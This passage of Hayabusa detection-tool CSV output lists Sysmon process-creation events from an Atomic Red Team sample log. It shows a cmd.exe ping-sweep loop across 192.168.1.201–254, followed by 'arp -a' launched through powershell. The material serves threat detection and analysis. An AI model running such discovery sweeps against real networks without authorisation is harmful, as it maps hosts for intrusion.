192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.201 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.202 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:16.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.203 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.204 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.205 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:17.438 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.206 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.207 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.208 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.209 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.210 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.211 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.212 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.213 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.214 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.215 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:22.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.216 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.217 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:23.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.218 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:23.993 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.219 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.220 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.221 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.222 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.223 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.224 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.225 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.226 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.227 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.228 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:29.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.229 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.230 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.231 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:30.521 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.232 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.233 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.234 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.235 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.236 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.237 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.238 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.239 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.240 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.241 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:35.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.242 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.243 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:36.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.244 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:37.012 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.245 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.246 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.247 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.248 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:39.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.249 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.250 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.251 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.252 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.253 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.254 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.061 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" : Path: 